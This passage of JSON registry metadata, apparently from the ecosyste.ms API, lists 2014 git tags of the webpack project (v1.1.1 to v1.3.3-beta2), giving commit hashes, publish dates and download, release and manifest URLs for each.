bpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/w